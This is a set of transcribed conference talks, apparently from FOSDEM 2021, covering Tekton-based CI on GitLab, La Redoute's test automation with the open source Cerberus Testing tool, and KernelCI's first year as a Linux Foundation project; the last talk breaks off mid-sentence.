report the status of the pipelines back to the Git provider, so in the future we are not going to need any commit status tracker — then we just rely on our merging bot and our pipeline engine. And in the far future, if you follow the Slack channel of Tekton and how things are going, maybe we're not going to need a merging bot either; maybe in the future we're going to have only Tekton, and Tekton will play the role of the chat bot. You could do some of it right now: you could use the pipeline resource called pull request, and the pull request could be modified depending on the comments in the chat. There's more. The whole Tekton environment is much, much bigger. We have CEL interceptors so we can modify the incoming JSON body of the webhooks. We have conditions. We have a lot of experimental features like our commit status tracker, and there are more: I saw there's even a Tekton results server which is going to keep the results of our pipeline runs, and someone is working on a notifier. There's also a Tekton operator which keeps our Tekton installation running, but unfortunately it only works with old Tekton versions — I guess the Tekton people need more support. And there's the Tekton Hub: from the Tekton Hub you can get tasks and Tekton pipelines, and you can even contribute there. Okay, that's how our Tekton setup on GitLab works. I believe it's a much nicer setup of GitLab than using the GitLab CI. Yeah, that's it. Thank you for your time. Are you there? Perfect. Okay, I'm live, and I can hear myself. So, the speaker is not here yet; he might join in a second — maybe one of the other moderators could ping him.
And then we'll get to the questions. I'll start with the first question. The question from the chat is that the viewer is not sure whether he missed it at the beginning, but why is Rafa using an external CI solution and not the GitLab CI? I think the explanation Rafa gave at the end was that the goal was basically to reduce GitLab to the bare tool, the code repository, so to say. Rafa, there you are. Yes, I was in the wrong room. So, why are we using these other technologies and not GitLab CI? First of all, I wanted to use Prow, and there was no Prow solution for GitLab; that's why I went with Lighthouse, and from Lighthouse I came to Tekton. The other reason was that I didn't want to be locked into GitLab: I want to be able to easily switch to GitHub or others. There were also other reasons: I was working with GitLab before and we used GitLab CI a lot, and it was not scaling nicely, because you ended up with includes of pipelines which were including other pipelines, and in the end no one knew what a given pipeline was really doing. Also, from my experience, it was not scaling well enough, so sometimes pipelines were not starting and there were some issues. With Tekton I have all the pipelines represented as Kubernetes objects — you just look at your Kubernetes cluster and there are your pipelines; you don't have to go into your repository. So those were the main reasons, and my private reason was...
Many organizations are using GitLab as a code repository and wonder, often too late, how to establish CI pipelines. ChatOps, automatic merging, cloud-native, webhook event triggers, serverless, job reusability, scalability, bot-users, simplicity are often on the wishlist. In this showcase we will fulfill the above wishlist with open source tools, speak about the issues that we overcame and demonstrate how to use GitLab as a pure code repository.
10.5446/52809 (DOI)
Hello and welcome to this FOSDEM 2021 talk. I am very happy to be here with you. We are in a remote setup, so I hope the sound and the presentation will come through well for you. I am here today to talk about two subjects, two stories in fact. One is how we managed to scale automated testing in an enterprise context, which is La Redoute, which is why I will first give some context about the company. And then I also want to talk about open source, because we developed a tool along this journey. So that is what we are going to share; I will also tell this second story, which is how we built this tool, why it is open source, what it is, and so on. So we will start with these two subjects. Before that, I will just introduce myself briefly: I am very passionate about technology, architecture and everything around enterprise transformation — making things better, building new projects and delivering them. I am involved in, and have a personal interest in, quality, because I am convinced it can help us a lot to produce better products for our companies. I am also involved in technology communities — meetups, blogs, open source projects — because I am convinced we can learn faster by sharing with each other; the world is already evolving fast and keeps accelerating, and I really believe that by connecting and learning from others we can all go faster. Personally, I am committed to Cerberus Testing, the open source project I am presenting today. If you want to know more, I am available on LinkedIn and Twitter, and I will be very happy to exchange with you. Let us start with the first part, the story of La Redoute. Some of you may not know it: La Redoute is a fashion retail company with more than 180 years of existence, and what you see on this slide is how people usually remember La Redoute — it was a printed catalogue business. It was in fact a precursor in this area, reaching families at home. People are used to seeing this logo in capital letters; you can see it in grey below the knitwear. It was a business model mainly built around the six-month frequency of the catalogues — this will be interesting for what comes next. On the top right you have a collection of the different catalogues that were created over time. Now La Redoute has changed in terms of segmentation and communication; the focus is on being the favourite platform for family and lifestyle. I will share a few images of what that means on the next slides. We also went through a major digital transformation, to be able to interact with our customers through different channels — web, apps and so on — but also to try to cope with the evolution of augmented reality and the mobile technology landscape. We sell apparel, and we are in a particularly competitive market; we design and produce our products internally.
We have designers and so on who are part of our company, in addition to the people who work on the website and the digital side, complemented by the people who run operations and customer service. In the last years of the transformation, we have also developed home items and furniture. What you can see here is internal creation of brands, such as AMPM: you can buy everything in this picture to create a style and decor. Here is another style, but in the same way, a La Redoute brand. We have also developed new businesses and brands, such as La Redoute for Business — we used to sell only B2C, and we developed a specific model, like this one, for La Redoute for Business. Here is the kind of brands we have, and we have also reopened shops, because we had not had physical shops for a long time after we accelerated on the digital transformation. And now we are also present in corners in large shopping malls; this is what you can see on the top right. I can now share a few figures about the company. It is a 750 million euro company, mainly active in Europe, even if we have some activities worldwide. The big specificity, as I told you, is that 73% of the products are designed internally. The company was created in France a long time ago, which is why it is very well known in France; that is not the case today in other countries. It is a high-traffic website, which is important to keep in mind for what we will do at the end of the talk. In terms of stakes, it is about the website and all the digital experiences: you can see 7 million unique visitors per month. There has also been a big shift in how we interact with customers: now more than 90% of interactions happen on digital channels, and we have a steady increase of the mobile application. In our transformation, we also implemented one of the most automated warehouses in Europe. That is interesting to share, because we also had to change the way we were testing. We have also opened around 50 store corners, with Galeries Lafayette and others, and we are now in a 51% partnership. So we have shared a bit of what La Redoute was and is — some context about the company — and we will now move on to the topics of value delivery, performance, organization and architecture, before getting to the open source testing part, the methodology and the framework. Five years ago there were transformation imperatives for the company; without transforming, we might not have survived. We had transformation KPIs, which are shown here. Going from left to right: we had to accelerate to become a digital player, to be more productive and to reach new customers faster. That was the first KPI, the 90%. We clearly had to accelerate the collection time: we were heavily impacted in terms of cash flow and were ending up in a vicious cycle in that context. We clearly had to accelerate on this point by a factor of 10, from 2 to 20 collections per year.
We also had to greatly improve our operational excellence, globally and transversally, and the top objective we had was to improve order preparation from 1.5 days to 2 hours. That means that if you place an order on the website and the items are available, it should be prepared two hours later. We also had to accelerate overall, in order to be able to offer and evaluate new business models for the company. Those were the imperatives; now let us look at how that translated into priorities. The first one was to accelerate the web and application delivery performance, to increase our capacity to interact digitally with customers — that is what you can see in the first box. And the last one was globally linked to the overall evolution of the company architecture, to make all of this faster and more flexible over time. Let us start with the web delivery part. Our starting point, and the steps we took: at first, on the left, we had two websites, one for France and one for the international markets, for historical reasons of how the company had decided to address international business separately from France. We had a problem, which was double specification and double coding of every business idea we wanted to implement. At that time, as we also wanted to benefit from economies of scale, we had to choose one platform — something that today might not necessarily be true, as we might want to keep some international specificities. At that time we had two choices: on the left, a site built by a fancy agency in New York; the other one was built more like a startup, in Malta. What we did is that we chose the Malta one, because we wanted to be a bit more in a startup mindset and to evolve that way. There were other reasons too, but globally the decision was made for these reasons. We ended up with a single implementation of business changes and only one platform for the mobile site and the web site. Afterwards we also did a big convergence to have a site that is 100% responsive, to further increase our capacity to accelerate and scale the implementation of business ideas. But what happened, typically, when we started from there — you can see at the top all the typical steps of the software development lifecycle — is that we had a long QA and UAT cycle. And what happened after this test cycle is that we found bugs that needed fixing, had to redo all these tests and verifications, maybe found yet another kind of bug, a regression, and in the end we were only able to deliver value to the business three months later. We did some root cause analysis on the kinds of issues we had. We identified this late UAT with manual tests and purely technical tests; globally, we were not testing early enough. And then we had big and risky releases, which were a cascading effect of this problem: we accumulated changes, branches and merges, because all the tests were slow.
So we had this kind of accidental complexity, and through this problem we also generated inconsistent environments, a complex codebase and indirect bugs, because all these problems compounded each other. So what we decided to address was this point of slow UAT, and at that point we decided to move to smaller and faster releases. We focused on four pillars. The first was functional test automation. The second was trunk-based development — I will explain a bit more what it is later. Also feature flags, and finally, correlated with that, to be able to deliver iterative increments of value: how to work with the business to have increments of features and specifications. So what that means in terms of what we wanted to achieve: on the functional test automation part, we really wanted to have the confidence to deliver changes. That means we had to be able to automate all the slow, repetitive manual tests, and if we wanted to automate, we had to be good at test reusability, maintainability and composition. The other point we wanted to address was the lead time: we had to move to a trunk-based development model. It had to address things like limiting work in progress and having small changes going to production, and the main objective was to remove all the branches and the complex merges. In fact, with a long UAT cycle and a large number of changes, we needed branches to manage those changes; we wanted instead to move forward with small changes. And then, to be able to release to production regularly, we relied on the feature flag pattern. The point was to decouple deployment from activation, to allow flexibility and gradual rollout — for example 1%, 25%, 50%, 100% — and also to get gradual feedback from the business on the feature, and to be able to revert and iterate if needed. And the last point was clearly to change the mindset: I no longer work on projects at a three or six month scale or more. I can think at that scale, but I must be able to define small changes, small specifications and small tests that I want to run on the website and on my customer experiences. So the most important thing is to be able to cut big ideas into small ideas that you can then deploy, and to evaluate a hypothesis with data points. So what we did, if you look at our scheme, is that we looked at the process and decided to put trunk-based development at the core of the development process, and then, in a shift-left pattern, we implemented functional test automation, feature flags and iterative specifications. We defined a fixed process: all developers have until 11 am to define the scope and push their development to trunk, and only what is in the trunk is shipped.
Then we have two hours to do the UAT with all the automated tests, which can be complemented by exploratory and manual testing, and what is validated goes on to the deployment process. In production we also use the feature flags, for activation and deactivation if we need it. And we also defined a fixed exception process, which is quite important so that you are not blocked if you have an exception. As for the results we achieved with this practice — as you have seen, it took some time to evolve these processes, and what you do not see here is the number of iterations we went through and what we learned in order to evolve. But now, since 2020, we are at more than 6,500 automated tests, and we deploy with confidence and a very high success rate today, because we have managed to automate a lot of tests. Here I wanted to share what we did to implement this test pyramid. We made choices, because we also have limited resources and effort available. As we looked at the e-commerce platform, which is mainly about digital and user experiences, we made the decision to focus on functional testing, mainly end to end, covering the customer journeys. We also test component features — for example a whole set of tests for the use-case components. Then we kept unit tests mostly for the core architecture code; that means we accepted not covering every use case with unit tests, because they are already covered by another layer. Integration tests we reduced to the strict minimum, by exception, because as we have good functional end-to-end tests, we do not need additional integration tests — they would just duplicate and overlap. And for manual testing, we only do exploratory testing at the top and a bit of manual testing while we automate the rest. As you see, this is not necessarily the traditional pattern, but something I want to share is that we are challenging the common assumption that functional, web and UI tests are slow and unmaintainable, or at least complex to maintain, and that you should therefore prefer unit tests. My conviction is that if you design bad unit tests, they are also really complex to maintain. And if you can execute your functional tests in parallel, at speed, they can be fast, and if you design them well, they can also be very maintainable. So again, I think we should challenge a bit the assumptions behind the test pyramid model, because if we look closely, maybe we can find a better solution for our particular context and objectives.
So, we have covered the development lifecycle process, but what about after something goes to production? For example, here is the type of dashboard we use to run functional tests in production. These are the exact same tests we run for non-regression testing; the main difference is that it is a subset of our internal tests, because we do not need to run them all — we cover the main customer journeys for each country — and they run on a regular basis, actually on a campaign basis, for non-regression. If we take a simple example, a login page test: it runs on desktop, on the mobile site and on the application, all the time, every five minutes, and what we look at are service KPIs and service level objectives — is it OK, and is there any degradation or acceptance issue in terms of response time and the execution of the test cases and customer journeys? The main benefit of doing that is that it greatly improves collaboration between business and IT, because we have common KPIs and facts, and it helps increase trust and transparency — it is as if we have a common enemy, rather than speaking different languages and holding different opinions. As we need to run these regression tests on a regular basis, every few minutes, if they are not well designed we get a lot of alert fatigue and people stop looking at the alerts. So it was a requirement to have very stable and truly automated tests, and that was also a very good outcome of this implementation. We were also able to reduce our MTTD and MTTR, because the tests are very reproducible: we have the history, we can see exactly which steps were executed, and we can replay them quite fast if we need to reproduce a situation that is happening. So, to use the buzzwords, we talk about testing in production or continuous testing, but the really important point is to make sure people are focused on how our software and our digital business behave in production, and not only on local optimisation, like test automation ratios, unit tests or purely developer-centric concerns. Now a quick look at what we addressed on the architecture side, which is really the key for this part. The result we achieved by addressing the structural issues is that we can clearly accelerate getting ideas into production: we can now release every day, which is a big change from when we were releasing every two to four weeks.
And we also reduced the QA or test cycle time from two weeks to two hours, also a big improvement for us. Now what we are looking at is optimising a bit further and reducing the limiting factors. In terms of limiting factors, looking at the top, on the organisation and architecture side the front end is not decoupled enough; that is why we are looking at moving to micro-frontends, to be able to iterate much faster, in parallel, on ideas based on the customer experience and journeys. The second point is that our automated test campaign runs for 40 to 60 minutes; we want to be able to run it in 5 minutes or so, to allow multiple deployments per day and further improve our deployment cycle time. And for the analysis of our tests we are exploring statistics, machine learning and AI technologies to reduce those timings. But again, we have to focus on the limiting factors, which are really, in order of importance, the architecture of our organisation and system, and the execution of the test campaign. The other parts are more exploratory, but still important to look at, especially flaky tests, auto-correction and test re-runs. What about the organisational part? What I can share in terms of practices is that we followed a fairly standard maturity path. Start with help — get testing expertise, get the initial automation and the right tooling — and do not try to implement a lot of automation and tooling from the start. The goal at first is to have a repeatable process that you can iterate on. When you start, you have to address the organisational side: the skills, the execution and so on. At the same time you have to hire people or move internal people into the new positions, integrate them into your ecosystem, and also give people the time to train properly for what they do. The typical pattern we have seen and implemented is to have a quality lead on both the business and the IT side, and to formalise it as a centre of excellence, or a test and training centre model. When you have something robust, you can deploy the practice more broadly and evolve the model to a more decentralised one: you start with more centralised validation, and then you can decentralise a series of decisions, relying more on decisions made by the people closest to the work. Something you can do, for example, is to have a quality manager or leader per area of your product. You can also have a tester directly included in the feature team, animated by a community of practice. So that is the typical pattern we have seen and implemented. And now, along this whole journey, we implemented the automation framework that is today open source: Cerberus Testing.
Now, because we really built on everything I just presented, this is the tooling we had to integrate with our organisation and process. First of all, why did we want to develop our own solution for test automation? I think that is clearly an important question to answer. We needed test automation because we had to accelerate the cycle time; we did not have the resources to do it manually, and even manually, with a lot of money and people, it would not be possible to reach the cycle time we wanted. So we had to have automated tests. At the time we looked — this was quite a few years ago — there was not really a viable option. The solutions that existed did not really cover the whole scope, between test definition, test execution and reporting, and the ones that were somewhat usable were really costly, and we did not have the budget for them. So we had good reasons to decide to implement our own test framework. How did this idea come to life? We started with a proof of concept and then applied it. We focused on three types of tests we wanted to do — a full-stack kind of testing: web, API and data. We wanted, for example, to be able to verify things in the database or through the API. The inspiration for the name — although it was not exactly planned from the start — really comes from Greek mythology: Cerberus, because it is three-headed; and Cerberus is now able to do many more types of tests, like mobile applications, desktop, and so on. We also liked the idea because Cerberus is the guardian of hell, which for us meant the guardian of our production systems. That is why we liked the Cerberus idea, and we added "Testing" at the end to make it clearer that it is a test framework. The problem we wanted to solve with Cerberus Testing was to iterate quickly between test definition, execution and reporting, in a common and collaborative way between the various people and roles you can see here. Starting at the top, there are business people and product owners who want to define their tests, do test management, plan tests, and so on. Then there are automation and QA engineers who do the test design and implementation for the teams, with tests executed on a regular basis in production and for releases. We need reporting, execution analysis, analytics, and so on. We also need people collaborating to prepare the datasets and the test data management. And then, as we move towards CI/CD patterns and continuous integration, we also need this kind of collaboration with the production and development teams. So what we implemented in the tool, and the way it works, is that we really focused on providing the necessary elements of these loops. We focused on having a common and collaborative test repository directly in the tool.
So you can have test descriptions in business language, and compose tests with a library of steps, actions and controls. We also use keyword-driven testing to be a simple, low-code test framework, so that a business person can describe a test in plain English without knowing anything about its technical implementation. Just after, someone from QA or an engineer can come and implement the keyword the business has defined, and that keyword then becomes reusable for the rest of the team. On the right-hand side, we wanted to have automation for the main use cases. In what we implemented, we realised we really wanted to build on solutions that can be extended, so we use open source solutions: for the web we use the Selenium WebDriver, mobile applications are based on Appium, and desktop integration uses Sikuli. We are able to test APIs over SOAP and REST, GraphQL, Kafka, files, and so on. And on the left, in relation to databases, we can verify within a test whether certain data is present in the database, but we can also use a test data framework to pull test data from specific sources — libraries, CSV files, applications, databases and so on. To have test data in our tests we can define, for example, a test property; it can be dynamic, so that for each test case, in its specific context, it will be different — it can be, for example, a function. And lastly, we wanted people to be able to define their tests, configure them and debug them, with native reporting inside the tool, so you do not need another tool or an HTML export. Why we wanted that is to have the advantage of traceability, the ability to replay, video recording, and all that kind of requirement, including test reporting and test analytics over a period of time. We really wanted all of that to be accessible, and that is why we also decided that Cerberus Testing should be available through a web interface. Another piece of information is that it is available on GitHub: we have more than 6,000 commits and around 30 contributors today. It is 100% open source, and there are demos and other resources available. We have an active community on Slack and GitHub, and there is a set of documentation available, which we know is very important for an open source project — or for any project — if we want to have people and interactions. And what you see at the bottom are the kinds of companies using it: the first ones are mostly retail companies with digital shops or stores, and more recently we have players from other industries — for example here, the media industry with TF1, which is a bit like Netflix, a video streaming platform, but in France, for a main TV channel. So thank you for your time; I am really happy to speak with you at FOSDEM.
If you liked the talk you can share it with me on LinkedIn, and if you like the project you can always give it a star on GitHub — that always helps us. And now I am happy to take your questions. Thank you very much. Thanks. You said that you put software in place for feature releases — could you say a bit more about that? Well, I just differentiate between the front — it is a front platform — and the back office, because it is a very different context. What I meant is that, in both cases, we started simple, with configuration code for the flags. Then, when we were a bit more mature, we accelerated with tooling, because we ended up with too many flags, for example on the web side, where we have many more features than in a simple back office. In fact, the back office is much simpler and made of more individual components, so on the web side we have more complexity. OK, thanks. The next question is from Nacho. If I understand correctly, you do more functional testing than unit testing. How do you make sure that all the corner cases and the different scenarios are covered? I think these tests would be harder to maintain compared to more isolated or unit tests. Also, what happens when you try to find a bug? Because if you have more tests at the outer level, it will be a bit harder to find where the problem is, versus having more low-level tests where you can pinpoint the problem directly. How do you deal with that? Yes, that is an interesting question. In fact, we made these choices because of a limiting factor: our platform at its core — and it is still a bit like that today — is not a single monolith, but I would say there are three big applications at the core, which means we have three big components to deal with. And the issue we have is mainly at that core: we have more problems with regressions at the core than with the functionalities themselves, because many functionalities reuse core services that sit underneath. We test from the end-to-end perspective, but we do not test every internal layer of the core separately. That is why we put the effort on functional tests: if we wrote too many unit tests, given that it is a core platform whose components are not modular enough, it would not have been very efficient. So that is why we made the trade-off to put more emphasis on functional tests. It was also a choice to be much more collaborative with the business, because before that we did many more low-level tests, and it was very hard to keep up with, even for the testers. That is why we chose to do it this way.
And in terms of maintenance and coverage, for me it really depends on how the tests are designed: with unit tests, yes, you can cover a variety of corner cases, but I would say that with functional tests you can do the same. So that is what we decided to do — we invested in functional tests on the website, and they cover the corner cases quite exhaustively.
Cerberus, in reference to the Greek mythology of the three-headed god, guardian of Hell, was the name given to the internal testing automation solution we decided to build internally in 2011. At that time, the ecosystem of existing solutions, being commercial or open source, was not fulfilling our requirements for end-to-end functional testing. In this article we will explain how our internal solution evolved from a Proof of Concept to a broader deploy in other major companies, to perform Continuous Delivery, Continuous Testing and Monitoring at scale.
10.5446/52810 (DOI)
Hello everyone. KernelCI has passed the test — now what does that really mean? If you're not familiar with the project already, KernelCI is a system for testing the upstream Linux kernel and also for collecting results from other CI systems, and a year ago it joined the Linux Foundation. The first year as a member of the Linux Foundation has been quite successful. We still have all the initial founding member companies — they've renewed their membership — and there's been some good feedback overall. We've achieved a lot of the things we wanted to do for the first year: we've started running more functional tests, and we've engaged with many other CI systems via the KCIDB project to gather results together, to collect results into a common place. We've learned more about the kernel community's needs — basically what the kernel community expects from a project like KernelCI. We've also improved how we maintain the project and the development workflows for the project itself, to make it easier for new people to join in and contribute. One thing we failed to do was to produce some stats about the impact that KernelCI is having on kernel quality. That is something we hope to do better, or really start doing, in 2021 with some new metrics; now that we're starting to have more results, we can use the data to draw a real picture of the impact of the project. Joining the Linux Foundation has had a big impact on the project, of course. We now have an annual budget from the membership fees, which we haven't been using too much yet, but it gives us an opportunity to grow the project in new ways. We also have cloud compute resources from Google and Microsoft Azure, so we're using those to build kernels and we'll be using them to run more tests; that has solved a lot of the bottlenecks we had before. We also identified the fact that we need to keep running tests initiated by KernelCI itself — that's what we call the native tests — while at the same time collecting results from other existing CI systems into a common database, which is what KCIDB does. We've also seen a great number of contributors to the project from new horizons, new companies and new individuals, and I think that is a direct effect of KernelCI being more established and accepted as the project that will really lead the way for upstream kernel testing. On this slide, you can see what has happened in the first year of KernelCI as a Linux Foundation project. It started in October 2019, when it was launched during the Embedded Linux Conference Europe. It took a few months to set things up: organize the board, define how the project would work, set up the budget, things like that. In the end, we came up with a mission statement to basically explain that KernelCI is there to improve the quality of the upstream Linux kernel. That was mentioned at FOSDEM last year, and I can say that a lot of things have happened since then and things have been growing pretty much as we would have liked. Since then, we've come up with a new prototype web dashboard for the KCIDB project. That's where you can see the collected data from other CI systems as well as the native KernelCI results, and it runs in parallel to the main web dashboard we have on kernelci.org. Then in March, we started using Microsoft Azure servers for hosting all our services.
The main website and all the infrastructure were previously hosted on servers donated by companies interested in KernelCI. It was never very sustainable, because it was hard to expand, hard to maintain, and all the servers were a bit different, so moving to the Microsoft Azure servers really helped us make the project sustainable. KernelCI had been doing builds and boot testing for a long time, and that was kind of the reputation of KernelCI — that it was about boot testing. In April and May last year that really started to change, when the web dashboard on kernelci.org was improved to show functional test results and not just boot results, and since then we've kept adding more and more tests to the native test system. Then in May and June, we conducted a community survey to learn more about the kernel community and how to really address its needs — I'll come back to that in detail a bit later. Then we started using Kubernetes for doing kernel builds, using cloud VMs from Google Compute Engine and Microsoft Azure, and this has really helped scale up the build capacity. We're planning to also use that to run tests that don't need a physical platform. Then in August, there was Linux Plumbers 2020, and that was a really important conference for KernelCI, being the main upstream kernel conference. We could really see that KernelCI was on a lot of people's minds and it came up in many different topics. Of course there was a testing microconference, so it was very present there, but it was also present in the real-time discussions — and actually, during the week of Plumbers, we started running real-time tests in KernelCI. It was also mentioned on the toolchain side: we improved how we test building the kernel with Clang, LLVM Clang. We also discussed how to improve kselftest support and many other things. So KernelCI was really present almost everywhere — not really as a main topic for Plumbers, but you could see it was becoming part of the community in a real, integral way. Then after that, we started receiving results from Google's syzbot into KCIDB. That was a really important milestone, because it was the first real external contributor to KCIDB. Initially we had CKI, which comes from Red Hat and started contributing right at the beginning of KCIDB — KCIDB was, to a large extent, driven by Red Hat — and the KernelCI native tests were also being added to the database. So having Google's syzbot was really a big milestone, showing that we could also have other CI systems contribute to KCIDB. Since then, we've made good progress with all of this as well. That was in September, so it's already a few months ago; I wanted to focus on the first year, but things have carried on happening since then. So basically we have a growing ecosystem — and by ecosystem I mean the kernel ecosystem as well as all the things related to testing around the kernel. We can look at it from the point of view of what testing is actually being done on the kernel; that's what we can call the kernel testing landscape. It's very segmented, basically. You have individual contributors — developers and maintainers — who run their own tests, typically tests they define themselves, or, if they are part of an organization, maybe the test system from their organization.
But they'll use what they have at their own disposal, what they have locally, and basically they will tailor it to match their needs for their day-to-day work. Then you have organizations like distributions, OEMs and SoC vendors. In this case, the kernels are tested in a more extensive way, but also in a more vertical way: testing only distro kernels, for example, and the tests will pretty much exercise the features of the distro, or of the product if it's a phone manufacturer or a server provider — or whatever else uses Linux. Linux is tested all the time on all these products, but in a very specific way, to make sure that the product works, not just the kernel. Similar things happen with CPU vendors and SoC manufacturers: slightly lower level, but still making sure that it works on their platforms. Of course, all of this makes sense for each individual organization and each individual developer, but none of it really tests the kernel for what it is, or in its entirety — and that's not really possible either. Then you have some more general projects, like Intel 0-Day, which try to build and test all the kernels. Many kernel builds are made by Intel 0-Day, for different architectures, and basically it's about building and testing patches from the mailing lists, which is really helpful and provides a really short feedback loop. But the actual tests are typically only run on Intel x86, because it's an Intel project — that's what makes sense for Intel, for the platforms and the focus they have. Then you have a different way of testing the kernel in a general way, with fuzzing — syzkaller and the syzbot service — which is about fuzzing the kernel with system calls. It's a very generic way of testing any part of the kernel, but on the other hand you can't do just that: you also have to do functional testing to find different kinds of problems. So all these things add up to the full picture of whether a kernel is good or not, and pulling them together is the mission of KernelCI. Now, this picture is, I guess, a familiar, typical example of what a test-driven workflow really looks like. For the upstream kernel, while some of that is happening, I think it's not really part of the kernel development itself; it's more like an asynchronous system where you have kernel development happening at its own pace and some test systems working in parallel at their own, different pace. For example, you have contributors who contribute to the kernel code and, to some extent, to the tests — in some cases both, because kselftest and KUnit are hosted directly in the kernel tree. Then, when new changes are made, you have the infrastructure building kernels, running the test suites, processing the data, generating reports, finding regressions — all that kind of processing — and then sending notifications by email and on the web dashboard to the contributors. In an ideal CI system, a change would need to pass some tests before it's accepted, before it's merged into the main branch. And we don't really have that in the upstream kernel at the moment.
For stable releases I think there's maybe an implicit expectation that, because some systems test stable kernels and send reports, a stable release would normally have waited for the results to come in before it was made. But I don't think there's any written agreement about that. You don't have a stamp on each kernel release saying this has passed all these tests; you can only assume it's the case. So if one CI system was down, or disappeared, or for some reason stopped testing a stable branch, I'm pretty sure the stable release would happen anyway. There would be some questions about what's going on, but it wouldn't be blocked by that. Unlike, say, GitLab, where you can set up the workflow so that each patch has to pass some pipelines, pass some tests, before it gets merged: if the tests don't pass, the patch typically isn't merged. That's a hard requirement, and we're quite far away from that in kernel development. It's especially true for the changes that land in linux-next, or even in mainline during the merge window. Basically the expectation is that everything gets merged together, people test it at their own pace and report problems, and gradually, with each release candidate, you would expect fewer people to report problems, or all the issues to have been fixed. But in the end you don't really have a positive confirmation that things are working well; you just assume that because nobody is reporting issues anymore, it should be fine. And I think that works because nobody is really using a mainline kernel, or even a stable kernel, directly in a product, so people will be testing it anyway as an integrated product, not just the kernel itself. Having some quality metrics directly for upstream kernels and stable releases is what KernelCI is about. That would remove some duplicated effort for all the OEMs, the distros, all the people reusing the kernel in a real environment: it would remove some of their testing effort, because they could already rely on what has been tested upstream. That's something that can't really be done right now. So then, to understand a bit better how to make KernelCI work for the community, we ran a survey. As I've just explained, the ecosystem is basically all the different players interacting with each other: people contributing, maintainers, people using the kernel in products, people making tests. All these people are part of a community, and the survey showed some interesting results. The main takeaways are that we should be trying to test patches more, or start testing patches with native tests, because right now all the tests on kernelci.org, and even all the builds on kernelci.org, are only there because a change was pushed to a git branch. We monitor a number of git branches, and when there's a new revision it gets built and tested. That works for a lot of things, but we're missing a lot of the early stages, when a change or even a patch series is being sent to a mailing list. That's when the first review is being done, and having it tested at that point by KernelCI would add a lot of value. It would also be easier to report issues, because we know the people on the thread would be notified of the results.
By comparison, when you have a regression in mainline during a merge window, or in linux-next, you have a lot of changes being merged all the time, so you don't really know which individual change caused the problem. If there's a regression between yesterday and today, you don't know who to tell. You can guess based on which tests failed, and you can run bisections to find the actual commit that caused the problem; that's the ideal case, because then you know exactly who to send the reports to. But that happens later, so it's like a medium feedback loop. We need a shorter feedback loop for the early stages of development. And then we also need longer-running tests, a long feedback loop, to be able to do things that individuals can't do themselves, like running really extensive tests that take days on a huge variety of platforms. These things we can do for RC tags or stable releases, because they don't get updated that often, and the idea is that these versions should really work as well as possible; that's why it's important to test them as much as possible, after the initial reviews have been done. I think syzbot is helping address this part of the problem, because fuzzing means long-running tests: the results are not really part of the short feedback loop you get when sending patches, things will be discovered later. But it's also something we should be improving with native tests; we could be running more LTP or maybe kselftest on a huge variety of platforms. That's something to explore. The third main takeaway from the survey was to improve the web dashboard. Even though a lot of the kernel development workflow happens over email, we found that a majority of people would also benefit from a web dashboard that gives them the information they need. The current dashboard is quite static, and we found that there are many different types of people who need to see the data in many different ways. Without a flexible way of doing that, or a more precise idea of what people really want and the degree to which they want to customize what they see, we can't really have a good dashboard. What we have now is a minimal version that works to some extent, but we're collecting user stories to try to understand better what an ideal dashboard would be, so that it really solves people's problems and becomes a really useful tool. So yes, we're trying to make this more data-driven, based on feedback from people. If you send us your feedback, we'll work with UX designers to find the best way to build a tool that works for people, and then we'll work on implementing it. And of course, having more feedback later, once we have something to show, will be really helpful as well. So how does KernelCI work? Now that we've explained all these things, I think it's important for people to have an idea of how it all fits together, so that you can contribute, take part in it, or maybe suggest ways to change it. Like I've explained before, you have the native tests. These are orchestrated directly by KernelCI. They normally run in LAVA test labs, but not necessarily; they can also run in other types of labs.
We have a couple of other types of labs, and you can also have tests running in Kubernetes, for things like static analysis. All these tests use the builds produced by KernelCI, the results are sent to the KernelCI backend, and you can see them on the KernelCI frontend on kernelci.org; emails are also sent with the results. Then we have the KCIDB database, which collects results from other CI systems, complete CI systems that do their own builds and run their own tests on their own platforms. They work on their own, but they submit the results they have to KCIDB. CKI has been doing that since the beginning, and we also have Google's syzbot. The native test results are also being added to KCIDB, and we have an increasing number of them, which I'll come back to a bit later. So what are the native tests? First you have the baseline tests, which are basically boot tests, but a bit more: boot to a login prompt, then check for kernel errors, and run the bootrr test suite, which has a series of checks for each platform to verify that the right drivers are loaded, devices are probed, and things like that. They run on all the platforms and all the kernels, basically all the combinations available to the native tests: all the labs connected to kernelci.org normally run baseline on all their machines. Then we have some custom-written tests, like the sleep test, which basically suspends the machine using rtcwake. I suspect this is similar to what some maintainers would have designed for their own personal workflow or their own local test system. So if that's the case, if you have a test like that that you think would benefit others, you can submit it to KernelCI, we can add it to the native tests and have it run more widely. Then we have more classic test suites. We have v4l2-compliance, which we've been running for a while now with UVC video webcams on a variety of platforms, and also with the vivid driver in QEMU. We have been running some parts of IGT for the Panfrost Mali GPU driver and also for some display drivers, DRM KMS drivers. More recently we started running LTP tests. As you know, LTP is a very big framework with a lot of tests. We've identified about 35 subsets of LTP that appear to be relevant to KernelCI because they exercise some part of the kernel, and we have two or three in production now, the IPC and crypto ones I believe. Some of them are still being worked on, so they're running only on the KernelCI staging instance, and they'll be deployed to production when they're working well enough on a number of platforms. We'll keep growing LTP support, and hopefully we'll have a good share of these 30 or 40 subsets by the end of 2021 if we keep up that pace. It's a similar story for kselftest: we started around the same time, but it's a very different test suite because it comes with the kernel. It's built in a very different way, so we had to fix some issues with how to build it initially. We've done that now, to separate the kselftest build log from the kernel build log, and we're also starting to look into how to run subsets of kselftest, especially because kselftest is more likely to cause kernels to hang or crash, or to have side effects that would make subsequent tests fail or not run at all.
This is especially true for kselftest, more than for LTP or other types of user-space tests. So we're still preparing all these different pieces to make it more reliable to build and run as a test suite. A lot of work has been done already and we don't yet see the results, because we're adding all these different bricks, and at some point we'll be able to turn the light on and then we'll have a lot of results coming in. It's different in that respect from LTP, because with LTP we had some results very early and we keep growing it in a linear way; with kselftest we have a threshold moment at some point where we'll suddenly have a lot of results, hopefully. Then there are many more in the pipeline, like I've mentioned before: KUnit, and cyclictest for real-time. Basically any test that exercises the kernel is a valid test. Whether the main KernelCI team of developers works on enabling it, or a maintainer, or someone else, it's important for us to accept it and make it easy for other people to contribute their tests. In order to scale, we need to be able to accept tests from other people as well. One special feature of the native tests is that they can be bisected: we can run an automated bisection for them, because KernelCI orchestrates the native tests, it does the builds, runs the tests and collects the results, and it can do that again for a different version of the kernel, running just one test, which is what a bisection does. For every KernelCI native test result we track whether it passed or failed. When a test used to pass and one day it starts failing on a branch, with one revision, a regression is recorded in the database, and normally an automated bisection is started for that regression. We have a 